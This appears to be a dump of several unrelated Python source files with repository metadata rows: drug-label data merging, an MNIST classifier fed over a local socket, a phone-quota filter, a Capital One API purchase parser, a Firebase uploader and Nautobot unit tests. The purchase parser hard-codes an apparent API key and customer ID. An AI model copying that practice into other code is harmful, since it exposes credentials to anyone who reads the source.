dm_df = pd.read_csv(FILE_PATH.DAILYMED_PREPROCESS)
print('DailyMed Preprocess: ' + str(len(dm_df)))
dm_df = dm_df.add_prefix('dm_')
dm_df['ID'] = dm_df['dm_FDA_Application_Number']
full_info_df = pd.merge(full_info_df, dm_df, how='left', on='ID')
# DrugBank
db_remap_df = pd.read_csv(FILE_PATH.DRUGBANK_REMAP)
print('DrugBank Remap: ' + str(len(db_remap_df)))
db_df = pd.read_csv(FILE_PATH.DRUGBANK_PREPROCESS)
print('DrugBank Preprocess: ' + str(len(db_df)))
db_df = db_df.add_prefix('db_')
db_df['ID'] = db_df['db_FDA_Application_Number']
full_info_df = pd.merge(full_info_df, db_df, how='left', on='ID')
# Drugs@FDA
drugs_fda_initial_df = pd.read_csv(FILE_PATH.DRUGSFDA_ORIGIN_DOCS, encoding="ISO-8859-1", delimiter='\t', dtype=str)
drugs_fda_initial_df = drugs_fda_initial_df[drugs_fda_initial_df.ApplicationDocsTypeID == '2']
print('Drugs@FDA Initial: ' + str(len(drugs_fda_initial_df)))
drugs_fda_accessible_df = pd.read_csv(FILE_PATH.DRUGSFDA_RAW)
print('Drugs@FDA Accessible: ' + str(len(drugs_fda_accessible_df)))
df_df = pd.read_csv(FILE_PATH.DRUGSFDA_PREPROCESS)
print('Drugs@FDA Preprocess: ' + str(len(df_df)))
df_df = df_df.add_prefix('df_')
df_df['ID'] = df_df['df_full_appl_no']
df_df = df_df.rename(columns={'df_full_appl_no': 'df_FDA_Application_Number'})
full_info_df = pd.merge(full_info_df, df_df, how='left', on='ID')
full_info_df['drug_count'] = full_info_df.apply(
lambda x: x[['dm_FDA_Application_Number', 'db_FDA_Application_Number', 'df_FDA_Application_Number']].count(), axis=1)
full_info_df['box_warning_count'] = full_info_df.apply(
lambda x: x[['dm_Box_Warning', 'df_Box_Warning']].count(), axis=1)
full_info_df['indication_count'] = full_info_df.apply(
lambda x: x[['dm_Indication', 'db_Indication', 'df_Indication']].count(), axis=1)
full_info_df['dosage_admin_count'] = full_info_df.apply(
lambda x: x[['dm_Dosage_Administration', 'df_Dosage_Administration']].count(), axis=1)
full_info_df['pregnancy_count'] = full_info_df.apply(
lambda x: x[['dm_Pregnancy', 'df_Pregnancy']].count(), axis=1)
full_info_df['lactation_count'] = full_info_df.apply(
lambda x: x[['dm_Lactation', 'df_Lactation']].count(), axis=1)
full_info_df['mechanism_of_action_count'] = full_info_df.apply(
lambda x: x[['dm_Mechanism_of_Action', 'db_Mechanism_of_Action', 'df_Mechanism_of_Action']].count(), axis=1)
full_info_df['pharmacodynamics_count'] = full_info_df.apply(
lambda x: x[['dm_Pharmacodynamics', 'db_Pharmacodynamics', 'df_Pharmacodynamics']].count(), axis=1)
full_info_df['information_for_patients_count'] = full_info_df.apply(
lambda x: x[['dm_Information_for_Patients', 'df_Information_for_Patients']].count(), axis=1)
full_info_df['absorption_count'] = full_info_df.apply(
lambda x: x[['dm_Absorption', 'db_Absorption', 'df_Absorption']].count(), axis=1)
full_info_df['distribution_count'] = full_info_df.apply(
lambda x: x[['dm_Distribution', 'db_Volume_of_Distribution', 'df_Distribution']].count(), axis=1)
full_info_df['metabolism_count'] = full_info_df.apply(
lambda x: x[['dm_Metabolism', 'db_Metabolism', 'df_Metabolism']].count(), axis=1)
full_info_df['excretion_count'] = full_info_df.apply(
lambda x: x[['dm_Excretion', 'db_Route_of_Elimination', 'df_Excretion']].count(), axis=1)
full_info_df['food_effect_count'] = full_info_df.apply(
lambda x: x[['dm_Food_Effect', 'df_Food_Effect']].count(), axis=1)
print('full_info_df: ' + str(len(full_info_df)))
full_info_df.to_csv('full_info_df.csv', index=False)
| Yiwen-Shi/drug-labeling-extraction | multi_data_source_combine.py | multi_data_source_combine.py | py | 5,224 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "static.constants.FI... |
20070281870 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A very simple MNIST classifier.
See extensive documentation at
http://tensorflow.org/tutorials/mnist/beginners/index.md
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Import data
from tensorflow.examples.tutorials.mnist import input_data
from array import array
import tensorflow as tf
import numpy as np
# preprocess need:
import os
import socket
from PIL import Image
#from array import *
from random import shuffle
#gzip (windows can use)
import gzip
import shutil
from random import randrange
imgName = 0
# Load from and save to
Names = [['D:\\test-images\\','test'], ['D:\\test-images\\','test']]
isRecv=False
tensorflow_img_recognize="tensorflowimg##"
prefix_tensorflow_prediction="tensorflowPrediction#"
recognize_false="false#"
recognize_true="true#"
# preprocess functions
def resizeImage(DATA_DIR):
# Names = [['training-images\\','train'], ['test-images\\','test']]
#DATA_DIR = "D:\\myimg2\\"
file_data = []
for filename in os.listdir(DATA_DIR):
print('Loading: %s' % filename)
im = Image.open(DATA_DIR+filename).convert('L') # to Gray scale
print (im.size)
width = 28
ratio = float(width)/im.size[0]
height = 28
nim = im.resize( (width, height), Image.BILINEAR )
print (nim.size)
nim.save(DATA_DIR+filename)
def convertImageToMnistFormat():
for name in Names:
data_image = array('B')
data_label = array('B')
FileList = []
for dirname in os.listdir(name[0])[0:]: # [1:] Excludes .DS_Store from Mac OS
print('dirname:'+dirname)
path = os.path.join(name[0],dirname)
for filename in os.listdir(path):
if filename.endswith(".png"):
FileList.append(os.path.join(name[0],dirname,filename))
if filename.endswith(".jpg"):
FileList.append(os.path.join(name[0],dirname,filename))
shuffle(FileList) # Usefull for further segmenting the validation set
for filename in FileList:
## print (filename)
label = int(filename.split('\\')[2])
Im = Image.open(filename)
print (filename)
pixel = Im.load()
width, height = Im.size
## print (width)
## print (height)
x=0
y=0
for x in range(0,width):
for y in range(0,height):
data_image.append(pixel[y,x])
data_label.append(label) # labels start (one unsigned byte each)
hexval = "{0:#0{1}x}".format(len(FileList),6) # number of files in HEX
# header for label array
header = array('B')
header.extend([0,0,8,1,0,0])
header.append(int('0x'+hexval[2:][:2],16))
header.append(int('0x'+hexval[2:][2:],16))
data_label = header + data_label
# additional header for images array
if max([width,height]) <= 256:
header.extend([0,0,0,width,0,0,0,height])
else:
raise ValueError('Image exceeds maximum size: 256x256 pixels');
header[3] = 3 # Changing MSB for image data (0x00000803)
data_image = header + data_image
output_file = open(name[1]+'-images-idx3-ubyte', 'wb')
data_image.tofile(output_file)
print (name[1]+'-images-idx3-ubyte' + 'success!')
output_file.close()
output_file = open(name[1]+'-labels-idx1-ubyte', 'wb')
data_label.tofile(output_file)
print (name[1]+'-labels-idx1-ubyte' + 'success!')
output_file.close()
##
def recvImage(DATA_DIR):
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 17784 # Reserve a port for your service.
s.connect(("127.0.0.1", port))
## s.send("imgte") only work on python 2.7
s.send(tensorflow_img_recognize.encode('utf-8')) # recv site also need to decode
global isRecv
while (not isRecv) :
print(isRecv)
cmd = s.recv(33)
strCmd = str(cmd.strip().decode('utf-8'))
print('daemon said: '+ strCmd)
if strCmd.find('readyTheFileBuffer')!=-1:
s.send((tensorflow_img_recognize+'fileBufferIsReady').encode('utf-8'))
# start recv file
global imgName
imgName = randrange(9999999) # random a img file name
with open(DATA_DIR+str(imgName)+'.jpg', 'wb') as f:
print ('file opened')
## data = s.recv(1024)
## f.write(991)
## print(len(data))
## print(len(cmd))
## data = ""
while True:
print('receiving data...')
data = s.recv(1024)
#print('data=%s', (data))
if not data:
break
# write data to a file
f.write(data)
f.close()
print('Successfully get the file')
s.close()
print('connection closed')
# why didn't need global keyword?
# global isRecv
isRecv=True
while True:
recvImage("D:\\test-images\\0\\")
##try :
## recvImage("D:\\test-images\\0\\")
##except:
## print ("exception")
if isRecv:
resizeImage("D:\\test-images\\0\\")
## resizeImage("D:\\training-images\\1\\")
## resizeImage("D:\\training-images\\2\\")
## resizeImage("D:\\training-images\\3\\")
## resizeImage("D:\\training-images\\4\\")
## resizeImage("D:\\training-images\\5\\")
convertImageToMnistFormat()
for name in Names:
with open(name[1]+'-images-idx3-ubyte', 'rb') as f_in, gzip.open('D:\\tmp\data\q'+name[1]+'-images.gz', 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
with open(name[1]+'-labels-idx1-ubyte', 'rb') as f_in, gzip.open('D:\\tmp\data\q'+name[1]+'-labels.gz', 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
flags = tf.app.flags
FLAGS = flags.FLAGS
# flags.DEFINE_string('data_dir', '/tmp/data/', 'Directory for storing data')
mnist = input_data.read_data_sets("D:\\tmp\\data\\", one_hot=True)
sess = tf.InteractiveSession()
# Create the model
x = tf.placeholder(tf.float32, [None, 784])
W = tf.Variable(tf.zeros([784, 10]))
b = tf.Variable(tf.zeros([10]))
y = tf.nn.softmax(tf.matmul(x, W) + b)
# Define loss and optimizer
y_ = tf.placeholder(tf.float32, [None, 10])
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
# Train
tf.initialize_all_variables().run()
for i in range(1000):
batch_xs, batch_ys = mnist.train.next_batch(100)
train_step.run({x: batch_xs, y_: batch_ys})
if i%100==0:
## # Test trained model
## correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
## accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
## print(accuracy.eval({x: mnist.test.images, y_: mnist.test.labels}))
# prediction label(program think what it is)
prediction=tf.argmax(y,1)
print(prediction.eval(feed_dict={x: mnist.test.images}))
myPrediction = str(prediction.eval(feed_dict={x: mnist.test.images}))
## # probility of the prediction
## probabilities=y
## print("probabilities", probabilities.eval(feed_dict={x: mnist.test.images}, session=sess))
## for i in range(1):
## # ground truth
## print(np.argmax(mnist.test.labels[i, :]))
##
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 17784 # Reserve a port for your service.
s.connect(("127.0.0.1", port))
## s.send("imgte") only work on python 2.7
# example: tensorflowimg##tensorflowPrediction#[5]
s.send((tensorflow_img_recognize+prefix_tensorflow_prediction+myPrediction).encode('utf-8')) # recv site also need to decode
while True :
cmd = s.recv(1024)
strCmd = str(cmd.strip().decode('utf-8'))
print(strCmd)
directoryNameStartInedx = len(prefix_tensorflow_prediction)+len(recognize_false)
original_img_path = 'D:\\test-images\\0'
training_false_img_path = 'D:\\training-images\\'+strCmd[directoryNameStartInedx:len(strCmd)]
training_true_img_path = 'D:\\training-images\\'+myPrediction[1:2]
print('directoryNameStartInedx:'+str(directoryNameStartInedx))
print('train_false_path:'+training_false_img_path)
print('train_true_path:'+training_true_img_path)
if strCmd.find('false')!=-1:
if not os.path.exists(training_false_img_path):
os.makedirs(training_false_img_path)
os.rename(original_img_path+'\\'+str(imgName)+'.jpg',training_false_img_path+'\\'+str(imgName)+'.jpg')
s.send((tensorflow_img_recognize+'saveToDbSuccessful').encode('utf-8'))
print('SaveToDbSuccessful')
isRecv=False
s.close()
print('connection closed')
break;
elif strCmd.find('true')!=-1:
print(myPrediction)
os.rename(original_img_path+'\\'+str(imgName)+'.jpg',training_true_img_path+'\\'+str(imgName)+'.jpg')
s.send((tensorflow_img_recognize+'saveToDbSuccessful').encode('utf-8'))
print('SaveToDbSuccessful')
isRecv=False
s.close()
print('connection closed')
break;
| SarahYuHanCheng/Eblockly | Tensorflow/mnist_softmax.py | mnist_softmax.py | py | 11,159 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "PIL.Image.open",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 60,
"usage_type": "name"
},
{
"api_name": "PIL.Image.BILINEAR",
"line_nu... |
38227461693 | import json
from typing import Tuple
import pandas as pd
from pandas import DataFrame
class QuotasFilter:
def filter_phone_numbers(self, phone_numbers: DataFrame, quotas: dict) -> Tuple[DataFrame, DataFrame]:
rows_with_quotas = []
rows_with_errors = []
for _, row in phone_numbers.iterrows():
new_row = dict(row)
region_quotas = quotas[row["RegionName"]]
try:
row_with_quotas = self.make_new_row_with_quota(new_row, region_quotas)
rows_with_quotas.append(row_with_quotas)
except KeyError as e:
row_json = dict(row)
row_json["reason"] = f"Нe найдена квота '{e}'"
rows_with_errors.append(row_json)
return pd.DataFrame(rows_with_quotas), pd.DataFrame(rows_with_errors)
def filter_reminders(self, phone_numbers: DataFrame, quotas: dict) -> Tuple[DataFrame, DataFrame]:
rows_with_quotas = []
rows_with_errors = []
for _, row in phone_numbers.iterrows():
new_row = dict(row)
if pd.isna(row["Group"]):
continue
new_row["Пол"], new_row["Возраст"] = self.get_age_and_gender_from_reminder(new_row)
region_name = row["RegionName"]
# 'Хабаровский край' is the only region name that differs between 'край' and 'Край' in different sources.
# We have to make this condition to keep regions consistent according to our internal standard.
region_quotas = {}
if region_name == "Хабаровский край":
region_quotas = quotas["Хабаровский Край"]
else:
region_quotas = quotas[region_name]
try:
row_with_quotas = self.make_new_row_with_quota(new_row, region_quotas)
rows_with_quotas.append(row_with_quotas)
except KeyError as e:
row_json = dict(row)
row_json["reason"] = f"Нe найдена квота '{e}'"
rows_with_errors.append(row_json)
return pd.DataFrame(rows_with_quotas), pd.DataFrame(rows_with_errors)
def make_new_row_with_quota(self, new_row: dict, region_quotas: dict) -> dict:
region_quota = region_quotas["Весь регион"]
if region_quota["balance"] <= 0:
new_row["IsCallable"] = False
new_row["Quota"] = f'"Весь регион": {json.dumps(region_quota, ensure_ascii=False)}'
return new_row
matching_quotas = dict()
matching_quotas["Весь регион"] = region_quotas["Весь регион"]
for quota_name in region_quotas:
quota = region_quotas[quota_name]
if self.is_group_quota_match(new_row, quota):
matching_quotas[quota_name] = quota
operator = new_row["OperatorName"]
matching_quotas[operator] = region_quotas[operator]
if all(
matching_quotas[quota_name]["balance"] == "" or matching_quotas[quota_name]["balance"] > 0
for quota_name in matching_quotas
):
new_row["IsCallable"] = True
new_row["Quota"] = f"{json.dumps(matching_quotas, ensure_ascii=False)}"
else:
new_row["IsCallable"] = False
new_row["Quota"] = f"{json.dumps(matching_quotas, ensure_ascii=False)}"
return new_row
@staticmethod
def is_group_quota_match(new_row: dict, quota: dict) -> bool:
if (
new_row["Пол"] == quota["gender"]
or quota["gender"] == ""
and isinstance(quota["age_from"], int)
and isinstance(quota["age_to"], int)
) and quota["age_from"] <= new_row["Возраст"] <= quota["age_to"]:
return True
return False
@staticmethod
def is_quota_balance_zero(quota: dict) -> bool:
if quota["balance"] == 0:
return True
return False
def get_age_and_gender_from_reminder(self, row: dict) -> Tuple[str, str]:
# "513_23_Тюменская область_Мегафон_Ж3645" --> ("Ж", "36")
group = row["Group"][-5:] # Ж3645
age = int(group[1:3])
gender = group[:1]
if gender == "М":
gender = "Мужской"
elif gender == "Ж":
gender = "Женский"
else:
raise ValueError("Gender is neither М nor Ж")
return gender, age
| tenetko/phone-numbers-beautifier | backend/src/core/quotas_filter/quotas_filter.py | quotas_filter.py | py | 4,558 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "pandas.DataFrame",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "typing.Tuple",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "pandas.DataFrame",
"... |
38819057412 | ## To call this stuff. First call the getAllPurchases which makes a request and sorts it. Then call the get*Food*() to get the food purchases
import requests
import json
import time, sys
customerId = '56c66be5a73e4927415073da'
apiKey = '52da742eb132c5000831254a4002207a'
# define global vars
foodPurchases = []
retailPurchases = []
onlinePurchases = []
# This is called by getAllPurchase(). No need to call this
def sortAllPurchases(allPurchases):
# First get all the categories we have
possibleCategories = []
for purchase in allPurchases:
possibleCategories.append(purchase['description'])
possibleCategories = list(set(possibleCategories))
# Create mapping to categories "food", "online", or "retail"
subcategoryMappingToCategory = {"fastFood":"food", \
"fineDining":"food", \
"apparelOnline":"online", \
"electronicsOnline":"online", \
"generalMerchandiseOnline":"online", \
"homeGoodsOnline":"online", \
"sportingGoodsOnline":"online", \
"hardware":"retail", \
"apparel":"retail"}
# Go through all purchases and sort them into the purchases global array variables
for purchase in allPurchases:
if purchase['description'] not in subcategoryMappingToCategory.keys():
# print "ERROR cannot sort %s into a category. may need to add the subcategory mapping" % purchase['description']
# print purchase
continue
if (subcategoryMappingToCategory[purchase['description']] is "food"):
global foodPurchases
foodPurchases.append(purchase)
elif (subcategoryMappingToCategory[purchase['description']] is "online"):
global onlinePurchases
onlinePurchases.append(purchase)
elif (subcategoryMappingToCategory[purchase['description']] is "retail"):
global retailPurchases
retailPurchases.append(purchase)
def getAllPurchase():
# first clear all global vars
global foodPurchases, retailPurchases, onlinePurchases
foodPurchases = []
retailPurchases = []
onlinePurchases = []
accountsUrl = 'http://api.reimaginebanking.com/customers/{}/accounts?key={}'.format(customerId, apiKey)
response = requests.get(accountsUrl)
accounts = response.json()
id = ""
for account in accounts:
if(account['type'] == 'Credit Card'):
id = account['_id']
break
urlToScrape = 'http://api.reimaginebanking.com/accounts/{}/purchases?key={}'.format(id,apiKey)
response = requests.get(urlToScrape)
retList = []
if response.status_code == 200:
conv = response.json()
for ii, con in enumerate(conv):
url = 'http://api.reimaginebanking.com/merchants/{}?key={}'.format(con['merchant_id'],apiKey)
response = requests.get(url)
name = response.json()['name'].replace("\x00", "")
retList.append({"id" : con['merchant_id'], "description" : con['description'],
"name": name, "date":con['purchase_date'],
"price":con['amount'] })
sortAllPurchases(retList)
return json.dumps(retList)
def getNamesAndGIS():
accountsUrl = 'http://api.reimaginebanking.com/customers/{}/accounts?key={}'.format(customerId, apiKey)
response = requests.get(accountsUrl)
accounts = response.json()
id = ""
for account in accounts:
if(account['type'] == 'Credit Card'):
id = account['_id']
break
# Get all purchases
purchasesUrl = 'http://api.reimaginebanking.com/accounts/{}/purchases?key={}'.format(id,apiKey)
# Creates a purchase
response = requests.get(purchasesUrl)
# Get the merchant ids we need
merchantIds = []
for merch in response.json():
merchantIds.append(merch['merchant_id'])
# Get all merchants up in the cloud to compare to
url = 'http://api.reimaginebanking.com/merchants?key={}'.format(apiKey)
response = requests.get(url)
allMerchants = response.json()
#filter the allMerchants to just the ones we want
newAllMerchants = []
for merch in allMerchants:
if merch['_id'] in merchantIds:
newAllMerchants.append(merch)
allMerchants = newAllMerchants
# filter out the ones that do not have the geotags
geotagsAndMerchants = {}
for merch in allMerchants:
if 'geocode' in merch:
geotagsAndMerchants[merch['name']] = [str(merch['geocode']['lat']), str(merch['geocode']['lng'])]
# Return a map of {name: [lat, long]}
return json.dumps(geotagsAndMerchants)
# getters for json data
def getFood():
getAllPurchase()
return json.dumps(foodPurchases)
def getRetail():
getAllPurchase()
return json.dumps(retailPurchases)
def getOnline():
getAllPurchase()
return json.dumps(onlinePurchases)
# TEST The stuff from the stats.json file
# with open('cache/stats.json') as data_file:
# allData = json.load(data_file)
# sortAllPurchases(allData)
# print getFood()
| jpurviance/Flex | C1Parser.py | C1Parser.py | py | 5,275 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number"... |
38026142247 | from firebase import firebase
import csv
linc = 'https://homerealtime-2be60.firebaseio.com'
def post_data(linc, m,d,t, dat):
firebas = firebase.FirebaseApplication(linc, None)
firebas.post(("%s/Weather/2018/%s/%s/%s"%(linc,m,d,t)), dat)
print("Posted data in %s/%s/%s" % (m,d,t))
month = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
newFile = []
times_missed = 0
monCount = 4
dayCount = 0
for y in range(0,12):
for z in range(1, 30):
link1 = 'D:\\FYP\\Weather_Data\\2018\\' + str(monCount + 1) + '\\' + str(z) + ' ' + month[
monCount] + ' 2018.csv'
with open(link1) as f:
a = [{k: v for k, v in row.items()}
for row in csv.DictReader(f, skipinitialspace=True)]
a.pop(0)
for i in range(0, len(a)):
tt = a[i]['Time']
tp = a[i]['Temp']
tp = tp.replace("°C", "")
ww = a[i]['Weather']
ww = ww.replace(".", "")
if "Rain" in ww or "rain" in ww:
ww = "Rain"
elif "Thunder" in ww:
ww = "Thunderstorms"
elif "cloud" in ww or "Cloud" in ww:
ww = "Clouds"
wi = a[i]['Wind']
wi = wi.replace(" km/h", "")
if "No wind" in wi or wi == "N/A":
wi = 0
bb = a[i]['Barometer']
bb = bb.replace("%", "")
if bb == "N/A":
bb = 65
vv = a[i]['Visibility']
vv = vv.replace(" mbar", "")
if vv == "N/A":
vv = 1006
d = {'Temp': tp, 'Weather': ww, 'Wind': wi, 'Barometer': bb,
'Visibility': vv}
#newFile.append(d)
post_data(linc,monCount+1,z,tt,d)
dayCount = dayCount + 1
monCount = monCount + 1
| MishaalSafeer/home-algo | uploadFire.py | uploadFire.py | py | 1,971 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "firebase.firebase.FirebaseApplication",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "firebase.firebase",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "csv.DictReader",
"line_number": 27,
"usage_type": "call"
}
] |
21131537908 | """Unit tests for nautobot_golden_config utilities helpers."""
import logging
from unittest.mock import MagicMock, patch
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase
from django.template import engines
from jinja2 import exceptions as jinja_errors
from nautobot.dcim.models import Device, Platform, Location, LocationType
from nautobot.extras.models import DynamicGroup, GitRepository, GraphQLQuery, Status, Tag
from nornir_nautobot.exceptions import NornirNautobotException
from nautobot_golden_config.models import GoldenConfigSetting
from nautobot_golden_config.tests.conftest import create_device, create_helper_repo, create_orphan_device
from nautobot_golden_config.utilities.helper import (
get_device_to_settings_map,
get_job_filter,
null_to_empty,
render_jinja_template,
)
class HelpersTest(TestCase): # pylint: disable=too-many-instance-attributes
"""Test Helper Functions."""
def setUp(self):
"""Setup a reusable mock object to pass into GitRepo."""
self.repository_obj = MagicMock()
self.repository_obj.path = "/fake/path"
GitRepository.objects.all().delete()
create_helper_repo(name="backup-parent_region-1", provides="backupconfigs")
create_helper_repo(name="intended-parent_region-1", provides="intendedconfigs")
create_helper_repo(name="test-jinja-repo", provides="jinjatemplate")
create_helper_repo(name="backup-parent_region-2", provides="backupconfigs")
create_helper_repo(name="intended-parent_region-2", provides="intendedconfigs")
create_helper_repo(name="test-jinja-repo-2", provides="jinjatemplate")
create_helper_repo(name="backup-parent_region-3", provides="backupconfigs")
create_helper_repo(name="intended-parent_region-3", provides="intendedconfigs")
create_helper_repo(name="test-jinja-repo-3", provides="jinjatemplate")
# Since we enforce a singleton pattern on this model, nuke the auto-created object.
GoldenConfigSetting.objects.all().delete()
self.content_type = ContentType.objects.get(app_label="dcim", model="device")
dynamic_group1 = DynamicGroup.objects.create(
name="test1 location site-4",
content_type=self.content_type,
filter={"location": ["Site 4"]},
)
dynamic_group2 = DynamicGroup.objects.create(
name="test2 location site-4",
content_type=self.content_type,
filter={"location": ["Site 4"]},
)
dynamic_group3 = DynamicGroup.objects.create(
name="test3 location site-all",
content_type=self.content_type,
filter={},
)
graphql_query = GraphQLQuery.objects.create(
name="testing",
query="""
query ($device_id: ID!) {
device(id: $device_id){
name
}
}
""",
)
self.test_settings_a = GoldenConfigSetting.objects.create(
name="test_a",
slug="test_a",
description="test_a",
weight=1000,
backup_repository=GitRepository.objects.get(name="backup-parent_region-1"),
intended_repository=GitRepository.objects.get(name="intended-parent_region-1"),
jinja_repository=GitRepository.objects.get(name="test-jinja-repo"),
# Limit scope to orphaned device only
dynamic_group=dynamic_group1,
sot_agg_query=graphql_query,
)
self.test_settings_b = GoldenConfigSetting.objects.create(
name="test_b",
slug="test_b",
description="test_b",
weight=2000,
backup_repository=GitRepository.objects.get(name="backup-parent_region-2"),
intended_repository=GitRepository.objects.get(name="intended-parent_region-2"),
jinja_repository=GitRepository.objects.get(name="test-jinja-repo-2"),
# Limit scope to orphaned device only
dynamic_group=dynamic_group2,
sot_agg_query=graphql_query,
)
self.test_settings_c = GoldenConfigSetting.objects.create(
name="test_c",
slug="test_c",
description="test_c",
weight=1000,
backup_repository=GitRepository.objects.get(name="backup-parent_region-3"),
intended_repository=GitRepository.objects.get(name="intended-parent_region-3"),
jinja_repository=GitRepository.objects.get(name="test-jinja-repo-3"),
dynamic_group=dynamic_group3,
sot_agg_query=graphql_query,
)
create_device(name="test_device")
create_orphan_device(name="orphan_device")
self.job_result = MagicMock()
self.data = MagicMock()
self.logger = logging.getLogger(__name__)
self.device_to_settings_map = get_device_to_settings_map(queryset=Device.objects.all())
def test_null_to_empty_null(self):
"""Ensure None returns with empty string."""
result = null_to_empty(None)
self.assertEqual(result, "")
def test_null_to_empty_val(self):
"""Ensure if not None input is returned."""
result = null_to_empty("test")
self.assertEqual(result, "test")
@patch("nautobot.dcim.models.Device")
def test_render_jinja_template_success(self, mock_device):
"""Simple success test to return template."""
worker = render_jinja_template(mock_device, "logger", "fake-template-contents")
self.assertEqual(worker, "fake-template-contents")
@patch("nautobot.dcim.models.Device")
def test_render_jinja_template_success_render_context(self, mock_device):
"""Test that device object is passed to template context."""
platform = "mock_platform"
mock_device.platform = platform
rendered_template = render_jinja_template(mock_device, "logger", "{{ obj.platform }}")
self.assertEqual(rendered_template, platform)
@patch("nautobot.dcim.models.Device")
# NOTE(review): these are test methods of a helper-test class whose header and
# fixtures (self.device_to_settings_map, self.test_settings_b/_c,
# self.content_type) are defined above this chunk — confirm against the full file.
def test_render_jinja_template_success_with_filter(self, mock_device):
    """Test custom template and jinja filter are accessible."""
    rendered_template = render_jinja_template(mock_device, "logger", "{{ data | return_a }}")
    self.assertEqual(rendered_template, "a")

@patch("nautobot.dcim.models.Device")
def test_render_filters_work(self, mock_device):
    """Test Jinja filters are still there."""
    # This has failed because of import issues in the past, see #607 for an example failure and fix.
    self.assertIn("is_ip", engines["jinja"].env.filters)
    self.assertIn("humanize_speed", engines["jinja"].env.filters)
    rendered_template = render_jinja_template(mock_device, "logger", "{{ '10.1.1.1' | is_ip }}")
    self.assertEqual(rendered_template, "True")
    rendered_template = render_jinja_template(mock_device, "logger", "{{ 100000 | humanize_speed }}")
    self.assertEqual(rendered_template, "100 Mbps")

@patch("nautobot_golden_config.utilities.logger.NornirLogger")
@patch("nautobot.dcim.models.Device", spec=Device)
def test_render_jinja_template_exceptions_undefined(self, mock_device, mock_nornir_logger):
    """Use fake obj key to cause UndefinedError from Jinja2 Template."""
    with self.assertRaises(NornirNautobotException):
        with self.assertRaises(jinja_errors.UndefinedError):
            render_jinja_template(mock_device, mock_nornir_logger, "{{ obj.fake }}")
    mock_nornir_logger.error.assert_called_once()

@patch("nautobot_golden_config.utilities.logger.NornirLogger")
@patch("nautobot.dcim.models.Device")
def test_render_jinja_template_exceptions_syntaxerror(self, mock_device, mock_nornir_logger):
    """Use invalid templating to cause TemplateSyntaxError from Jinja2 Template."""
    with self.assertRaises(NornirNautobotException):
        with self.assertRaises(jinja_errors.TemplateSyntaxError):
            render_jinja_template(mock_device, mock_nornir_logger, "{{ obj.fake }")
    mock_nornir_logger.error.assert_called_once()

@patch("nautobot_golden_config.utilities.logger.NornirLogger")
@patch("nautobot.dcim.models.Device")
@patch("nautobot_golden_config.utilities.helper.render_jinja2")
def test_render_jinja_template_exceptions_templateerror(self, template_mock, mock_device, mock_nornir_logger):
    """Cause issue to cause TemplateError from Jinja2 Template."""
    with self.assertRaises(NornirNautobotException):
        with self.assertRaises(jinja_errors.TemplateError):
            template_mock.side_effect = jinja_errors.TemplateRuntimeError
            render_jinja_template(mock_device, mock_nornir_logger, "template")
    mock_nornir_logger.error.assert_called_once()

def test_get_backup_repository_dir_success(self):
    """Verify that we successfully look up the path from a provided repo object."""
    device = Device.objects.get(name="test_device")
    backup_directory = self.device_to_settings_map[device.id].backup_repository.filesystem_path
    self.assertEqual(backup_directory, "/opt/nautobot/git/backup-parent_region-3")
    device = Device.objects.get(name="orphan_device")
    backup_directory = self.device_to_settings_map[device.id].backup_repository.filesystem_path
    self.assertEqual(backup_directory, "/opt/nautobot/git/backup-parent_region-2")

def test_get_intended_repository_dir_success(self):
    """Verify that we successfully look up the path from a provided repo object."""
    device = Device.objects.get(name="test_device")
    intended_directory = self.device_to_settings_map[device.id].intended_repository.filesystem_path
    self.assertEqual(intended_directory, "/opt/nautobot/git/intended-parent_region-3")
    device = Device.objects.get(name="orphan_device")
    intended_directory = self.device_to_settings_map[device.id].intended_repository.filesystem_path
    self.assertEqual(intended_directory, "/opt/nautobot/git/intended-parent_region-2")

def test_get_job_filter_no_data_success(self):
    """Verify we get two devices returned when providing no data."""
    result = get_job_filter()
    self.assertEqual(result.count(), 2)

def test_get_job_filter_site_success(self):
    """Verify we get a single device returned when providing specific site."""
    result = get_job_filter(data={"location": Location.objects.filter(name="Site 4")})
    self.assertEqual(result.count(), 1)

def test_get_job_filter_device_object_success(self):
    """Verify we get a single device returned when providing single device object."""
